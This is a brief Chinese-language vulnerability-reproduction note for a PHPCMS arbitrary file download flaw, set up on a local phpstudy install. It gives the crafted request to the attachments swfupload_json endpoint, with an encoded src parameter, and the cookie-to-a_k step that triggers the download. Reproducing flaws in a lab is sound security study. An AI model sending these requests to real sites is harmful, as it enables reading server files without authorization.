环境搭建
①在phpstudy下进行环境的搭建
②安装成功后用之前设置的管理员账号密码登陆后台
③开启phpcms手机门户,然后退出管理后台
漏洞复现
①访问该站点http://127.0.0.1/phpcmsfx/index.php?m=wap&c=index&a=init&siteid=1并且用firebug获取该网站的cookie
②带上上一步获取到的cookie访问网站,用hackbar发送Post数据http://127.0.0.1/phpcmsfx/index.php?m=attachment&c=attachments&&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/module
post_data : userid_flash=第一步获取到的cookie值
③用hackbar获取cookie的值
④将上一步获取到的cookie的值赋给a_k参数,成功出现下载